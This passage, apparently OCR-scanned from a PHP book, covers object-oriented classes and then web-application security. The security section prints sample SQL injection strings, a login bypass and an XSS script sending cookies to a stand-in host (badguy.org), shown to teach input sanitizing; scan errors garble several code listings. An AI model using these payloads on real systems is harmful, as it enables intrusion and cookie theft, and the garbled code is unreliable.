check to make sure that the value is a number. For instance, you might write 
the method as follows: 

class CustomerOrder 
{ 

private $total = 0.0; 
function additem($amount) 

{ 

if(is_numeric($amount) 

{ 

$this->total = $this->total + $amount; 

echo ''$ainount added; current total is $this->total" ; 

} 

else 

( 

echo "value passed is not a number."; 

} 

} 

} 

If the value passed is an integer, a float, or a string that is a number, the 
amount is added. If not, the error message is displayed. The sum in $ total 
is a float because it is assigned a number with a decimal point in it. When the 
amount passed in is added to $sum, it is automatically converted to a float 
by PHP. 

When you write methods, PHP allows you to specify that the value passed 
must be an array or a particular object. Specifying what to expect is called 
type hinting. If the value passed is not the specified type, an error message 
is displayed. You don’t need to add statements in the method to check for 
array or object data types. For example, you can specify that an array is 
passed to a function, as follows: 

class AddingMachine 
{ 

private $total = 0; 
addNumbers (array $nuinbers) 

{ 

for($1=0;$i<=sizeof($numbers);$i++) 

{ 

$this->total = $this->total + $numbers[$i]; 

} 


} 


} 
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If you attempt to pass a value to this method that is not an array, an error 
message similar to the following is displayed. 

Catchable fatal error: Argument 1 passed to 

AddingMachine::addNumbers() must be an array, integer 
given,... 

This error states that an integer was passed, instead of the required array. 
The error is fatal, so the script stops at this point. You can also specify that 
the value passed must be a specific object, as follows: 

class ShoppingCart 
{ 

private $items = array(); 
private $n_items = 0; 

function addltem( Item $item ) 

{ 

$this->items[] = $item; 

$this->n_items = $this->n_items + 1; 

} 

} 



The ShoppingCart class stores the items in the shopping cart as an array 
of Item objects. The method additem is defined to expect an object that 
was created from the class item. If a value is passed to the additem method 
that is not an item object, an error message is displayed, and the script stops. 

Methods can be declared public, private, or protected, just as properties 
can. Public is the default access method if no keyword is specified. 

PHP provides some special methods with names that begin with_(two 

underscores). PHP handles these methods differently internally. This chap¬ 
ter discusses three of these methods: construct, destruct, and clone. Don’t 
begin the names of any of your own methods with two underscores unless 
you’re taking advantage of a PHP special method. 


Understanding pubtic and pri(/ate 
properties and methods 

Properties and methods can be public or private. Public means that methods 
or properties inside the class can be accessed by the script that is using the 
class or from another class. For example, the following class has a public 
property and a public method: 

class Car 
{ 

public $gas = 0; 
function addGas($amount) 

{ 
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$this->gas = $this->gas + $aitiount; 
echo "$amount gallons added to gas tank"; 

} 

} 

The public property in this class can be accessed by a statement in the 
script outside the class, as follows: 


$mycar = new Car; 

$gas_amount = $mycar->gas; 

After these statements are run, $gas_amount contains the value stored in 
$car inside the object. The property can also be modified from outside the 
class, as follows: 

$mycar->gas = 20; 

Allowing script statements outside the class to directly access the proper¬ 
ties of an object is poor programming practice. All interaction between the 
object and the script or other classes should take place using methods. The 
example class has a method to add gas to the car. All gas should be added to 
the car by using the addGas method, which is also public, using statements 
similar to the following: 

$new_car = new Car; 

$new_car->addGas(5) ; 

You can prevent access to properties by making them private, as follows: 

private $gas = 0; 


With the property specified as private, a statement in the script that 
attempts to access the property directly, as follows: 

$myCar->gas = 20; 

gets the following error message: 

Fatal error: Cannot access private property car::$gas in c:\ 
testclass.php on line 17 

Now, the only way gas can be added to the car is by using the addGas 
method. Because the addGas method is part of the class statement, it can 
access the private property. 

In the same way, you can make methods private or protected. In this case, 
you want the outside world to use the addGas method. However, you might 
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want to be sure that people buy the gas that is added. You don’t want any 
stolen gas in the car. You can write the following class: 

class Car 
{ 

private $gas = 0; 

private function addGas($amount) 

{ 

$this->gas = $this->gas + $amount; 
echo "$amount gallons added to gas tank"; 

} 

function buyGas($amount) 

{ 

$this->addGas($amount); 

} 


With this class, the only way gas can be added to the car from the outside is 
with the buyGas method. The buyGas method uses the addGas method to 
add gas to the car, but the addGas method can’t be used outside the class 
because it’s private. If a statement outside the class attempts to use addGas, 
as follows, a fatal error is displayed, as it was for the private property: 

$new_car = new Car; 

$new_car->addGas(5); 

However, a statement outside the class can now add gas to the car by using 
the buyGas method, as follows: 

$new_car = new Car; 

$new_car->buyGas(5); 

You see the following output: 

5 gallons added to gas tank 
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It’s good programming practice to hide as much of your class as possible. 
Make all properties private. You should make methods public only if they 
absolutely need to be public. 

Writinq^ the constructor 

The constructor is a special method, added with PHP 5, that is executed 
when an object is created using the class as a pattern. A constructor isn’t 
required, and you don’t need to use a constructor if you don’t want to set 
any property values or perform any actions when the object is created. Only 
one constructor is allowed. 


Object-Oriented 

Programming 


liW defining a Class 


The constructor has a special name so that PHP knows to execute the 

method when an object is created. Constructors are named_ construct 

(two underscores). A constructor method looks similar to the following: 

function _construct() 

{ 

$this->total =0; # starts with a 0 total 

} 


This constructor defines the new CustomerOrder. When the order is cre¬ 
ated, the total cost is 0. 



Prior to PHP 5, constructors had the same name as the class. You might run 
across classes written in this older style. PHP 5 and later scripts look first 

for a method called_ construct () to use as the constructor. If it doesn’t 

find one, it looks for a method that has the same name as the class and uses 
that method for the constructor. Thus, older classes still run under PHP 5 
and 6. 


Putting it att together 

Your class can have as few or as many properties and methods as it needs. 
The methods can be simple or complicated, but the goal of object-oriented 
programming is to make the methods as simple as is reasonable. Rather than 
cram everything into one method, it’s better to write several smaller methods 
and have one method call another as needed. 

The following is a simple class: 

class MessageHandler 
{ 

private $message; 

function _construct ($inessage) 

{ 

$this->message = $message; 

} 

function displayMessage() 

{ 

echo $this->message. "\n''; 

} 


The class has one property — $message — that stores a message. The mes¬ 
sage is stored in the constructor. 

The class has one method — displayMessage. Echoing the stored message 
is the only thing the messageHandler object can do. 
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Suppose you want to add a method that changes the message to lowercase 
and then automatically displays the message. The best way to write that 
expanded class is as follows: 

class MessageHandler 

{ 

private $message; 

function construct($message) 

{ 

$this->message = $message; 

} 

function displayMessage() 

{ 

echo $this->message."\n"; 

} 

function lowerCaseMessage() 

{ 

$this->message = strtolower($this->message); 
$this->displayMessage(); 

} 


Note the lowerCaseMessage () method. Because the class already has a 
method to display the message, this new lowerCaseMessage () method 
uses the existing displayMessage () method rather than repeating the 
echo statement. 

Any time you write a method and find yourself writing code that you’ve 
already written in a different method in the same class, you need to redesign 
the methods. In general, you shouldn’t have any duplicate code in the same 
class. 

The example in Listing 4-1 is a complicated class that can be used to create 
an HTML form. To simplify the example, the form contains only text input 
fields. 


Listing 4-1: A Script That Contains a Class for a Form Object 

<?php 

/* * Class name: Form 

* Description: A class that creates a simple HTML form 

* containing only text input fields. The 

* class has 3 methods. 

*/ 

class Form 
{ 

private $fields = array!); # contains field names and 

labels 

private $actionValue; # name of script to process form 

private $submit = "Submit Form"; # value on submit button 

(continued) 
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Listing 4-1 (continued) 

private $Nfields =0; # number of fields added to the form 

/* Constructor: User passes in the name of the script where 

* form data is to be sent ($actionValue) and the value to 

* display on the submit button. 

*/ 

function construct($actionValue,$submit) 

{ 

$this->actionValue = $actionValue; 

$this->submit = $submit; 

} 

/* Display form function. Displays the form. 

*/ 

function displayForm() 

{ 

echo "\n<form action='{$this->actionValue}' 
method='POST'>\n"; 

for($j =1;$j<=sizeof($this->fields);$j ++) 

{ 

echo "<p style='clear: left; margin: 0; padding: 0; 
padding-top: 5px'>\n"; 

echo ''<label style= ' float: left; width: 20%’> 

{$this->fields[$j-l]['label']}: </label>\n"; 
echo ''<input style= ' width: 200px' type= ' text' 

name='{$this->fields[$j-l]['name']}'></p>\n"; 

} 

echo "<input type='submit' value='{$this->submit}' 

style='margin-left: 25%; margin-top: 10px'>\n"; 
echo "</form>"; 

} 


/* Function that adds a field to the form. The user needs to 

* send the name of the field and a label to be displayed. 

*/ 

function addField($name,$label) 

{ 

$this->fields[$this->Nfields]['name'] = $name; 
$this->fields[$this->Nfields]['label'] = $label; 
$this->Nfields = $this->Nfields + 1; 

} 

} 

?> 

This class contains four properties and three methods. The properties are 
as follows: 

♦ $f ields: An array that holds the fields as they are added by the user. 
The fields in the form are displayed from this array. 
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♦ $actionValue: The name of the script that the form is sent to. This 
variable is used in the action attribute when the form tag is displayed. 

♦ $submit: The text that the user wants displayed on the Submit button. 
This variable’s value, Submit Form by default, is used when the 
Submit button is displayed. 

♦ $Nf ields: The number of fields that have been added to the form so far. 
The methods in this class are as follows: 

♦ _construct: The constructor, which sets the values of $actionValue 

and $ submit from information passed in by the user. 

♦ addField: Adds the name and label for the field to the $ fields array. 
If the user added fields for first name and last name to the form, the 
array might look as follows: 

$fields[l][name]=first_name 
$fields[l][label]=First Name 
$fields[2][name]=last_name 
$fields[2][label]=Last Name 
and so on 

♦ displayForm: Displays the form. It echoes the HTML needed for the 
form and uses the values from the stored variables for the name of the 
field and the label that the user sees by the field. 

The next section describes how to use a class, including the Form class 
shown in Listing 4-1. 


Using a Class in a Script 

The class code needs to be in the script that uses the class. Most commonly, 
the class is stored in a separate include file and is included in any script that 
uses the class. 

To use an object, you first create the object from the class. Then that object 
can perform any methods that the class includes. Creating an object is called 
instantiating the object. Just as you can use a pattern to create many similar 
but individual dresses, you can use a class to create many similar but indi¬ 
vidual objects. To create an object, use statements that have the following 
format: 

$objectnaine = new classname (value, value; 

Some valid statements that create objects are 

$Joe = new Person("male"); 

$car_Joe = new Car("red"); 
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$car_Sain = new Car ("green") ; 

$customerl = new Customer("Smith","Joe",$custID); 

The object is stored in the variable name, and the constructor method is 
executed. You can then use any method in the class with statements of the 
following format: 

$Joe->goToWork(); 

$car_Joe->park("illegal"); 

$car_Sam->paintCar("blue"); 

$name = $customerl->getName(); 

Different objects created from the same class are independent individu¬ 
als. Sam’s car gets painted blue, but Joe’s car is still red. Joe gets a parking 
ticket, but it doesn’t affect Sam. 

The script shown in Listing 4-2 shows how to use the Form class that was 
created in the preceding section and shown in Listing 4-1. 


Listing 4-2: A Script That Creates a Form 

<?php 

/* * Script name: buildForm 

* Description: Uses the form to create a simple HTML form 
*/ 

require_once("Form.class") ; 

echo "<html><head><title>Phone form</title></head><body>"; 
$phone_form = new Form("process.php","Submit Phone"); 

$phone_form->addField("first_name","First Name"); 
$phone_form->addField("last_name","Last Name"); 

$phone_form->addField("phone","Phone"); 
echo "<h3>Please fill out the following form:</h3>"; 
$phone_form->displaYForm(); 
echo "</bodY></html>"; 

?> 

First, the script includes the file containing the Form class in the script. The 
class is stored in the file Form, class. The script creates a new form object 
called $phone_f orm. Three fields are added with the addField method. 
The form is displayed with the displayForm method. Notice that some 
additional HTML code is output in this script. That HTML could have been 
added to the displayForm method just as easily. 

The script creates a form with three fields, using the Form class. Figure 4-1 
shows the resulting web page. 
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Figure 4-1: 

The form 
displayed by 
the script in 
Listing 4-2. 


Please nil out the follo>>1iig foiin: 


First Name: 
Last Name: 
Phone: 


Done 


Submit Phone 


Using Abstract Methods in Abstract 
Classes and Interfaces 

You can use abstract methods that specify the information to be passed, 
but do not contain any code, and we tell you how to do that in the following 
sections. Abstract methods were added in PHP 5. You can use abstract methods 
in abstract classes or in interfaces. An abstract class contains both abstract 
methods and nonabstract methods. An interface contains only abstract 
methods. 

Using an abstract class 

Any class that has an abstract method must be declared an abstract class. 
The function of an abstract class is to serve as a parent for a child class. You 
cannot create an object from an abstract class. 

An abstract class specifies the methods for a child class. The child class 
must implement the abstract methods that are defined in the parent class, 
although each child class can implement the abstract method differently, 
with different code. If an abstract method specified in the parent class is not 
included in a child class, a fatal error occurs. 
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An abstract method specifies the values to pass, called the signature. The 
child implementation of the abstract method must use the same signature. 
The child must define the method with the same or weaker visibility. For 
example, if the abstract method is declared protected, the child implementa¬ 
tion of the method must be declared protected or public. 

The following code shows the use of an abstract class. An abstract class 
named Message is defined. Then two child classes are defined. 

abstract class Message 
{ 

protected inessage_content; 

function _construct($text) 

{ 

$this->message_content = $text; 

} 

abstract public function displayMessage($color); 

} 

class GiantMessage extends Message 
{ 

public function displayMessage($color) 

{ 

echo "<hl style='color: $color'> 

This->message_content</hl>"; 

} 

} 

class BigMessage extends Message 
{ 

public function displayMessage($color) 

{ 

echo "<h2 style='color: $color'> 

This->message_content</h2>"; 

} 

} 

The abstract class message includes an abstract method named 
displayMessage. This abstract method is implemented in the two child 
classes — GiantMessage and BigMessage. In GiantMessage, the mes¬ 
sage content is displayed with an <hl> tag in the color passed to the 
method. In BigMessage, the message is displaying with an <h2> tag in the 
color passed. Thus, both child classes implement the abstract method, but 
they implement it differently. 

If a child class doesn’t implement the abstract class, an informative error 
message is displayed, stating exactly how many abstract classes are not 
implemented and their names. The error is fatal, so the script stops at that 
point. 
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You can implement an interface at the same time you extend a class, including 
an abstract class. Using interfaces is described in the next section. 

Usin^ interfaces 

An interface contains only abstract methods. The function of an interface 
is to enforce a pattern on a class by specifying the methods that must be 
implemented in the class. You cannot create an object from an interface. 

An interface can’t have the same name as a class used in your script. All 
methods specified in an interface must be public. Don’t use the keyword 
abstract for methods in an interface. When a class implements an interface, 
all the methods in the interface must be implemented in the class. If a 
method is not implemented, a fatal error occurs. 

You implement an interface in a class with the following format: 

class classname implements interfacename 

You can implement more than one interface in a class, as follows: 

class classname implements interfacenamel, interfacename2,... 

Multiple interfaces implemented by a single class may not contain methods 
with the same name. 

The following example shows the use of both inheritance and an interface: 

interface Moveable 
{ 

function moveForward($distance); 

} 

class Car 
{ 

protected $gas = 0; Book IV 

Chapter 4 

function _construct($amt) 

{ 

$this->gas = $amt; 

echo "<p>At creation. Car contains $this->gas 
gallons of gas</p>"; 

} 

} 

class Sedan extends Car implements Moveable 
{ 

private $mileage = 18; 

public function moveForward($distance) 

{ 
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$this->gas = $this->gas - 

round(($distance/$this->mileage),2); 
echo "<p>After moving forward $distance miles, 

Sedan contains $this->gas gallons of gas.</p>"; 

} 

} 

The class Sedan is a child of the class Car, which is not an abstract class, 
and also implements the interface Moveable. You can use the preceding 
code with the following statements: 

$my_car = new Sedan(20); 

$my_car->moveForward(50); 

The following displays in the browser window: 

At creation. Car contains 20 gallons of gas 

After moving forward 50 miles, Sedan contains 17.22 gallons 
of gas 

The first statement displays when the object $my_car is created. Because 
the Sedan class doesn’t have a constructor, the constructor in the Car class 
runs and produces the first line of output. The second statement displays 
when the moveForward method is used. 


Pre(/entin0 Changes to a Class or Method 

You might want a class to be used exactly as you have written it. You can 
prevent the creation of a child class that changes the implementation of 
methods with the final keyword, as follows: 

final class classname 

When a class is defined as final, a child class can’t be created. You can 
also define a method as final, as follows: 

final public moveForward() 

If a child class Includes a method with the same name as a final method in 
the parent class, an error message is displayed, similar to the following: 

Fatal error; Cannot override final method Car::moveForward() 

In this case, the parent class Car includes a method moveForward that is 
defined as final. The child class Sedan extends Car. However, the Sedan 
class defines a method moveForward, a method with the same name as a 
final method in the parent Car class. This isn’t allowed. 






Handling Errors vUith Exceptions 




Hmdtin^ Errors With Exceptions 

PHP provides an error-handling class called Exception. You can use this 
class to handle undesirable things that happen in your script. When the 
undesirable thing that you define happens, code in your method creates an 
exception object. In object-oriented talk, this is called throwing an exception. 
Then, when you use the class, you check whether an exception is thrown 
and perform specified actions. 

You can throw an exception in a method with the following statement: 

throw new Exception("message"); 

This statement creates an Exception object and stores a message in the 
object. The Exception object has a getMessage method that you can use 
to retrieve the message you stored. 

In your class definition, you include code in your methods to create an 
Exception when certain conditions occur. For example, the addGas 
method in the following Car class checks whether the amount of gas 
exceeds the amount that the car gas tank can hold, as follows: 

class Car 
{ 

private $gas = 0; 

function addGas ($ainount) 

{ 

$this->gas = $this->gas + $amount; 

echo "<p>$amount gallons of gas were added</p>"; 

if($this->gas > 50) 

{ 

throw new Exception("Gas is overflowing"); 

} 

} 

} 

If the amount of gas in the gas tank is more than 50 gallons, the method 
throws an exception. The gas tank doesn’t hold that much gas. 

When you use the class, you test for an exception, as follows: 

$my_car = new Car(); 

try 

{ 

$mY_car->addGas(10); 

$mY_car->addGas(45); 

} 

catch(Exception $e) 

{ 
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echo $e->getMessage(); 
exit(); 


The preceding script contains a try block and a catch block: 

♦ try: In the try block, you include any statements that you think might 
trigger an exception. In this script, adding too much gas can trigger an 
exception, so you add any addGas method calls inside a try block. 

♦ catch: In the catch block, you catch the Exception object and call 
it $e. Then you execute the statements in the catch block. One of the 
statements is a call to a method called getMessage in the Exception 
class. The getMessage function returns the message that you stored, 
and your statement echoes the returned message. The statements then 
echo the end-of-line characters so the message is displayed correctly. 
The script stops on the exit statement. 

If no exception is thrown, the catch block has nothing to catch, and it 
is ignored. The script proceeds to the statements after the catch block. 
In this case, if the amount of gas doesn’t exceed 50 gallons, the catch 
block is ignored, and the script proceeds to the statements after the 
catch block. 

If you run the preceding script, the following is displayed by the browser: 

10 gallons of gas were added 
45 gallons of gas were added 
Gas is overflowing 

The second addGas method call raised the amount of gas over 50 gallons, so 
an exception was thrown. The catch block displayed the overflow message 
and stopped the script. 


Copying Objects 

PHP provides a method you can use to copy an object. The method is_ 

clone, with two underscores. You can write your own_ clone method in 

a class if you want to specify statements to run when the object is copied. If 

you don’t write your own, PHP uses its default_ clone method that copies 

all the properties as is. As shown by the two underscores beginning its 
name, the clone method is a different type of method, and thus is called dif¬ 
ferently, as shown in the following example. 

You could write the following class: 
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class Car 
{ 

private $gas = 0; 
private $color = "red"; 
function addGas($amount) 

{ 

$this->gas = $this->gas + $amount; 
echo ''$amount gallons added to gas tank" ; 

} 

function _clone() 

{ 

$this->gas = 5; 

} 


Using this class, you can create an object and copy it, as follows: 

$firstCar = new Car; 

$firstCar->addGas(10); 

$secondCar = clone $firstCar; 

After these statements, you have two cars: 

♦ $f irstCar: This car is red and contains ten gallons of gas. The ten 
gallons were added with the addGas method. 

♦ $secondCar: This car is red, but contains five gallons of gas. The 

duplicate car is created using the_ clone method in the Car class. 

This method sets gas to 5 and doesn’t set $color at all. 

If you didn’t have a_ clone method in the Car class, PHP would use a 

default_ clone method that would copy all the properties, making 

$secondCar both red and containing ten gallons of gas. 


Comparing Objects 

At their simplest, objects are data types. You can compare objects with the 
equal operator, which is two equal signs (==), or with the identical operator, 
which is three equal signs (===). Using the equal operator, two objects are 
equal if they are created from the same class and have the same properties 
and values. However, using the identical operator, two objects are identical 
only if they refer to the same instance of the same class. 

The following two objects are equal, but not identical, because they are two 
instances of the class Car: 

$my_car = new Car(); 

$my_car2 = new Car(); 
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Thus, the following statement would echo equal: 

If($mY_car == $my_car2) 

{ 

echo "equal"; 

} 

But, the following statement would not echo equal: 

If($mY_car === $mY_car2) 

{ 

echo "equal"; 

} 

The following two objects are equal, but not identical, because clone cre¬ 
ates a new instance of the object Car: 

$mY_car = new Car(); 

$mY_car2 = clone $mY_car; 

The following two objects are both equal and identical: 

$mY_car = new Car(); 

$mY_car2 = $mY_car; 


Getting Information about Objects and Classes 

PHP provides several functions that you can use to get information about 
objects and classes: 

♦ You can check whether a class exists with the following: 

class_exists ( " classnaiae") ; 

♦ You can test whether a property exists in a specific cleiss with the 
following: 

propertY_exists ( "classname","propertyname "); 

♦ You can find out the properties, with their defaults, and the methods 
defined in a class with the following statements: 

get_class_vars(" classname"); 

get_class_methods( "classname "); 

The get_class_ functions return an array. The properties array con¬ 
tains the property name as the key and the default as the value. The 
methods array contains numeric keys and the names of the methods as 
values. If a property or method is private, the function will not return its 
name unless it is executed from inside the class. 
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♦ You can test whether an object, its parents, or their implemented 
interfaces were created by a specified class using the instanceof 
operator, added in PHP 5, as follows: 

if($objectname instanceof "classname") 

♦ You can find out the current values of the properties of an object with 
the following function: 

get_object_vars ($ojbiectname) ; 

The function returns an array containing the current values of the 
properties, with the property names as keys. 


Destroying Objects 

You can destroy an object with the following statement: 

unset($objName); 

For example, you can create and destroy an object of the Car class with the 
following statements: 

$myCar = new Car; 
unset($myCar); 

After $myCar is unset, the object no longer exists at all. 

PHP provides a method that is automatically run when an object is 

destroyed. You add this method to your class and call it_ destruct (with 

two underscores). For example, the following class contains a_ destruct 

method: 

class Bridge 
{ 

function _destruct() 

{ 

echo "The bridge is destroyed"; 

} 

} 

If you use the following statements, the object is created and destroyed: 

$bigBridge = new Bridge; 
unset($bigBridge); 

The output from these statements is 
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The output is echoed by the_ destruct method when the object is unset. 

The_ destruct method isn’t required. It’s just available for you to use 

if you want to execute some statements when the object is destroyed. For 
example, you might want to close some files or copy some information to 
your database. 
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In This Chapter 

Securing the Server and the Apache weh server 
Configuring PHP securely 
Handiing errors safeiy 
Sanitizing variables 


dM s a web developer, you need to ensure that your web application is 
r " secure. If you’re also performing administration duties on the server, 
then you need to secure the server as well. Securing the application means 
making sure any and all inputs from users are sanitized, or checked, against 
values that you know are good and not allowing any input into the program 
unless you’ve programmatically checked it. Securing the server means 
attempting to keep the web application in its own virtual sandbox, so that if 
the server is compromised the damage is limited. 

This chapter discusses security for web applications. You look both at 
server security and application security. 


Securing the Sender 

The server itself should be secured. This usually means hardening the 
server and ensuring that the server uses a firewall. 

Haritenin^ the sert/er 

Typically this means hardening the operating system by uninstalling unnec¬ 
essary services. For example, there’s typically no reason to run a print server 
on the same server that runs the public website. 

Disabling and uninstalling unnecessary services reduces the footprint of the 
server, which means that there are fewer things for an attacker to exploit. 

Tools like SELinux and grSecurity also enhance the security of a server and 
reduce the ability of successful attackers from compromising more than 
their own little sandboxes. 
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Usin0 a fireWatt 

Whether you use a firewall on the server Itself or use a firewall at the point 
where the Internet meets your network, or both, you should make sure that 
there’s a firewall blocking connections to all ports except those specifically 
allowed, such as TCP ports 80 and 443 for a typical web server. 

A better scenario is to run the firewall both at the ingress point (the point 
where the Internet meets your network) and on the server itself. Doing so 
means that the web server will be protected even if an attacker finds another 
way into the network. 

All major operating systems include built-in firewall tools and they’re both 
easy to set up and easy to maintain. 


Securing Apache 

Securing the Apache web server is a pretty broad topic, so rather than try to 
fit everything into one section, we focus on two ways to make Apache more 
secure when it’s running PHP applications: using SuExec and mod_security. 
If you’re using a third-party hosting provider, then you won’t be able to 
install SuExec or mod_security but rather will rely on the hosting provider 
for (and let them worry about) server security. 

Securing PHP applications With SuEkcc 

If your application runs on Apache (as more than half the websites on the 
Internet do), you may want to consider enabling SuExec in your Apache con¬ 
figuration. SuExec is a mechanism that is bundled with Apache that causes 
scripts to be run as the user that owns the script, rather than running them 
as the web server user. 

In a non-SuExec environment, all scripts are run as the same user ID as the 
web server itself. Unfortunately, one vulnerable script can give a malicious 
user back-door access to the entire web server, including scripts running on 
other sites hosted on the same server. 

SuExec attempts to mitigate this problem by restricting web applications to 
their own areas and running them under their owners’ user IDs, rather than 
under the web server’s user ID. For example, this script would run under the 
user ID of j smith: 

/home/~jsmith/public_html/scripts/please_hack_me.php 
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A malicious user could exploit this script, but he or she would have access 
only to files and programs that the j smith user is allowed to use. Every 
other user on the server would be protected from j smith’s insecure script. 

Unfortunately, getting SuExec to work properly with virtual hosts, or multiple 
Independent websites physically located on the same web server, can be 
tricky. SuExec is designed to run scripts that exist in the web server’s docu¬ 
ment root. Most virtual hosts are set up in a way that gives each individual 
website its own document root, and each site’s document root isn’t located 
under the web server’s document root. To get around this restriction, the 
system administrator must add each virtual host’s document root to the 
web server’s document root variable in the Apache configuration file. 

SuExec also requires that PHP scripts be run as Common Gateway Interface 
(CGI), which is slower than running PHP as a precompiled module under 
Apache. CGI was the first workable model for web applications, and it is still 
used for simple scripts. However, once you leave the realm of PHP scripting 
and start writing full-fledged applications, you’ll need the performance boost 
of precompiled PHP. 

For fairly simple web servers, SuExec can keep one insecure application from 
trampling all over everything else. However, in a more complex environment 
with virtual servers, precompiled modules, and dozens or hundreds of users, 
you need a security model that is a bit more robust. mod_security (which we 
cover in the next section) is a giant leap forward in web server security, espe¬ 
cially for servers that run virtual servers and precompiled PHP. 

mod_security is an open-source module that no Apache server should run 
without. It’s a robust filtering engine that watches incoming requests (both 
GET and POST) and weeds out the ones that are likely to cause problems for 
the server and its applications. If your server is running SuExec, mod_secu- 
rity is a great first line of defense — and you can never have too many lines 
of defense when it comes to web server security! 

mod_security works by intercepting all traffic bound for your web server. It 
compares the traffic to a set of rules to determine whether to stop each indi¬ 
vidual packet or allow it to proceed to the web server. Think of it as having 
your own personal bouncer standing at the door to your server. 

Out of the box, mod_security comes with a set of core rules designed to pro¬ 
tect servers from most generic attacks. You can add your own rules as you 
need them to respond to specific attacks on your applications. 
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Unfortunately, Apache doesn’t come with mod_security, so you have to get it 
yourself. Luckily, it’s open source and available from www.modsecurity. org. 
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Setting Security Options in php.ini 

The php. ini file has a number of security-related options. Table 5-1 
explains the recommended setting for each option. See Book Vll, Chapter 1 
for more information on the php.ini file. 


Table 5-1 Recommended Security Settings for php.ini 

Option 

description 

safe_inode = on 

Limits PHP scripts to accessing only files 
owned by the same userthatthe script 
runs as, preventing directory traversal 
attacks. 

safe_mode_gid = off 

This setting, combined with saf e_mode, 
allows PHP scripts access only to files 
forwhich the owner and group match the 
user/group that the script is run as. 

open_basedir = directory 

When this parameter is enabled, the PHP 
script can access only files located in the 
specified directories. 

expose_php = off 

Prevents PHP from disclosing information 
about itself in the HTTP headers sent to 

users. 

register_globals = off 

If this parameter is enabled, all environ¬ 
ment, GET, POST, cookie, and server 
variables are registered as globals, 
making them easily available to attackers. 
Unless you have no other options but to 
enable it, you should leave register_ 
globals off. 

display_errors = off 

Prevents PHP errors and warnings from 
being displayed to the user. Not only do 

PHP warnings make your site look unpro¬ 
fessional, but they also often reveal sensi¬ 
tive information, such as pathnames and 

SQL queries. 

log_errors = on 

When this parameter is enabled, all warn¬ 
ings and errors are written to a log file in 
which you can examine those warnings 
and errors later. 

error_log = filename 

Specifies the name of the log file to which 
PHP should write errors and warnings. 
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Hmdtin^ Errors Safety/ 

In an ideal world, when you create a form that asks users to type in their first 
name, you can reasonably expect that they will enter something like John 
or Jane. Unfortunately, you also get users who leave the form blank, type in 
their address, or simply enter a random string of characters. And those are 
the benign users. Attackers enter things into your form for nefarious purposes. 
Consider the following information on how the bad guys operate and how to 
stay one step ahead of them. 

Understanding the dangers 

Attackers use different methods to put your website at risk. One type of 
attack is called SQL injection. In this attack, an attacker assumes that the 
information collected in a form is going to be used in a SQL query and exe¬ 
cuted against your database. The attacker types characters into your form 
field that can cause you problems when used in a query. 

For example, the attacker might enter something like John ; drop%2 0 
table%2 0users. If your application is set up to enter users’ names into the 
database, your SQL query would look something like 

INSERT INTO users VALUES (John; drop table users); 

Depending on your server configuration, the server might read that query 
and merrily go about dropping the users table from your database. It might 
complain about the syntax a little, but if you have a loose database configu¬ 
ration, it will do exactly what that line of code tells it to: Add “John” to the 
users table, and then drop the table named users. Not good. 

In another example of SQL injection, characters are entered into the user- 
name field of a form to bypass authentication. Suppose the user types the 
following characters into the username field: 

John' OR 'foo' = 'foo' -- 

Your script might contain the following statement to test the username and 
password: 

$sql = "SELECT * FROM User WHERE userlD = '$_POST[userlD]' 

AND password = '$_POST[password]; 

If you insert the code that the user types in, without changing it, you have 
the following SQL query: 

$sql = "SELECT * FROM User WHERE username = 'John' OR 'foo' = 
'foo' -- ' AND password = '$_POST[password]'"; 
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This query allows the user to log in without a valid username or password. In 
the first phrase in the WHERE clause, the foo = foo is true. Then, the-- 
makes the rest of the query into a comment, effectively invisible in the 
query. Consequently, this query always matches a row. 

Another type of dangerous form input is when the attacker enters a script 
into your form field. For instance, the attacker might enter the following into 
a form field: 

<script>docuinent.location='http://badguy.org/bad.php?cookies=' 

+ document.cookie </script> 

If you store this text and then send it to someone who visits your website, 
your visitor will send the cookies related to your application to the bad guy. 
Another bad script might be the following: 

<script language=php eval(rm *); </script> 

Testing for unexpected input 

You can make a couple of pretty accurate assumptions about the data you 
expect the user to enter. For instance, when you ask for a name, you expect 
the following to be true: 

♦ The data is alphabetical — no numbers. 

♦ The name might have a space, an apostrophe, or a hyphen, such as 
Mary Jane, O’Hara, or Anne-Marie. 

♦ The data certainly doesn’t include HTML tags or other bits of code. 

These assumptions are the keys to testing for unexpected input. Pass the 
input through a regular expression by using PHP’s preg_match () function 
to determine whether it contains any nonalphabetical characters, other than 
a space, an apostrophe, or a hyphen. 

Regular expressions (or regexes, for short) are the essence of all input testing. 
Refer to Chapter 2 of this minibook for an explanation of regular expressions. 

You need to do more than sanitize user input though. If you reflect any input 
back to the user, such as a confirmation screen, you must also sanitize HTML 
generated by your application and sent to the user. A malicious user can 
inject markup into your application to entice another user into clicking a link 
that takes him or her (unknowingly) away from your site to a phishing clone. 

To prevent this type of attack — it’s often referred to as user hijacking or 
cross site scripting — use htmlentities ( ) on any value you plan to use to 
render HTML, as shown in this example: 
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$inputString = "<b>Hello World</b>''; 

$safe_string = htmlentities($inputString); 

In this example, $safe_string would contain the following character string: 
&lt;b&:gt;Hello World&lt; /b&gt; 

A better solution is to use the preg_match again and make sure there are 
no unexpected characters in the input. Why bother allowing users to put 
HTML into their input? In other words, if you notice characters other than 
those allowed, simply error out and present the user with a message indicat¬ 
ing that his or her input was not valid, as discussed in the next section. 

Handting^ the unexpected 

Most of the time, you test your user’s input, and it passes through your 
regular expressions without a hitch. But what do you do when something 
goes wrong? 

The simplest way to handle unexpected input is to stop the application com¬ 
pletely. However, even though this method will stop bad data from getting 
into your application, it can also cause confusion and frustration for legitimate 
users who simply mistyped their information. 

Therefore, a better solution is to return the user to the input screen and ask 
him or her to try again. You can make the system more user friendly by letting 
the user know which fields caused problems. Book VI, Chapter 3, shows how 
to process forms, redisplaying the form when invalid data is entered in the 
form fields. 

If your tests catch something that looks like malicious activity, you might 
want to take additional steps, such as writing to the log file, notifying the 
administrator, or even blocking the IP address from which the offending 
input originated. 

Checking att form data 

Check all the information in your form, including any information that the user 
selects from lists, check boxes, or radio buttons. These fields can contain 
bad information as well. 

How does bad data get sent in from a drop-down or radio button? Easy. There 
are browser plug-ins that enable the values from get and POST data right 
after the Submit button is clicked. So malicious people could simply change 
any of the values to whatever they wanted. 
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The key for all of it is to validate what you expect to receive against what 
you actually received. You can check your list variables with regular expres¬ 
sions. For instance, the following regular expression matches only the speci¬ 
fied text: 

preg_match("/(male|female)/") 


Sanitizing Variables 

Sometimes, telling users to go back and try again when they fail to enter 
valid data simply isn’t an option. When you have to make do with what the 
user gives you, you can use a couple of techniques to make sure that bad 
data doesn’t break your application — or, worse, the underlying systems 
